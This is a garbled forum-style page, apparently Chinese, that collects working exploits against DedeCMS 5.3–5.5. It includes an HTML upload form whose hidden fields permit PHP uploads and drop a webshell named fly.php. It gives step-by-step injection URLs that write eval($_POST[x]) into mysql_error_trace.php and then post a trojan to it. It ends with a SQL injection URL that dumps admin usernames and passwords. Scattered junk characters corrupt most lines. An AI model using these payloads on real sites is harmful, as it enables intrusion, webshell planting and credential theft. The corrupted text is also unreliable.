<input type='hidden' name='cfg_basedir' value='../../' />
) b! O# ]/ J, _( d5 f<input type='hidden' name='cfg_imgtype' value='php' />" g& g5 Q' F/ Q9 k
<input type='hidden' name='cfg_not_allowall' value='txt' />2 ~* B) C+ ^, T# H6 E
<input type='hidden' name='cfg_softtype' value='php' />8 o" J( z7 N) K7 U* o% E. ~9 J+ Q
<input type='hidden' name='cfg_mediatype' value='php' />9 S1 J9 a' v7 g- f5 m
<input type='hidden' name='f' value='form1.enclosure' />) |0 y+ Q% |# h: h: |" b+ K4 O% I
<input type='hidden' name='job' value='upload' />; z$ u# D7 W: T" u$ Q2 j5 P9 R
<input type='hidden' name='newname' value='fly.php' />
5 k8 z) v* k" n/ `5 s" X+ TSelect U Shell <input type='file' name='uploadfile' size='25' />
- Z' D$ \! z  r& m& F<input type='submit' name='sb1' value='确定' />$ c4 r: k3 D# E0 Q
</form>( e! c4 L4 m/ F
<br />It's just a exp for the bug of Dedecms V55...<br />5 p, a  x7 v0 @* C" e
Need register_globals = on...<br />, C' i1 E5 P0 R: R8 k- ^
Fun the game,get a webshell at /data/cache/fly.php...<br />9 Z8 b5 E  X+ g9 l  J, X0 V
</body>
* P% g7 j! q! m$ F8 A" {</html>! q' t. b% H7 s- z* ]% i, u! i
- D3 f0 r2 R1 V* A
: a, Q3 e1 p; W$ Z) L0 _

# s; o2 p. V+ b# j2 B1 e* X+ _5 c; i. _1 U- Q3 T

/ V0 \  x6 S' b" s2 @8 O& \
5 ^0 j5 A  D( o' _. o" v$ J. X/ m* P4 o' d

3 A( j8 u3 E$ H5 ^) d  d+ h* V- x' n8 ?! o

: p4 t: \6 t3 i: c$ ~3 h4 U0 e. w织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞* ?! ]( v: l( r, Z5 p; v/ y. J* \
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。6 O- i7 C, Z2 [" n2 N* B! q/ O
1. 访问网址：* N. P( `& l5 `) l9 j. ^
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>* D8 [9 M5 ~8 Q. a
可看见错误信息* t. x6 P- Y- H9 L- F1 l. j+ R
! L$ [$ g7 t0 m% e/ F

/ r2 v. L9 d4 S; e) F% x( ~1 _2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
5 P$ l$ M9 u7 v" ^int(3) Error: Illegal double '1024e1024' value found during parsing9 `$ s) ~. V" T2 z' d. d$ D
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
2 R% U9 F6 n, b6 ~9 G' G2 M- z& v, A, W6 X" `
# B" c8 i" j$ g8 B
3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是' W  a7 p! m6 H' b; T8 k

: k0 C2 _8 x3 |& W8 y
5 v1 e( T& `1 P. H3 Y<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. U3 g9 }1 H. X# S- V& r4 e& P# E( Y; j# @) R8 Z" G9 A

8 N- w* i, s" F/ S) r' J0 f7 l按确定后的看到第2步骤的信息表示文件木马上传成功.+ V+ q0 B& w5 K$ ]4 W7 m
! }1 D) I+ V7 _8 X$ k

$ C: e2 Q3 p  h, ^
0 i8 y: I  H0 I2 Z1 f' ^# S+ k3 y, k/ z, D# C$ L

/ X) ]! G# |7 i# _6 o
: W: H. t6 W* d! v" n0 C
% u- v: ]9 R  y# G$ Y$ X& ?: P
1 L" I+ l0 |3 {- i! w- V5 o0 y% t9 c! A+ r* b# x5 j
0 ?- y* Y* h& K5 m' S

4 F2 Y  n) l! k; v: E: P( G: h
' I* E3 e& T2 T) [织梦(DedeCms)plus/infosearch.php 文件注入漏洞: r9 m3 q7 ]* ^, W4 y
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册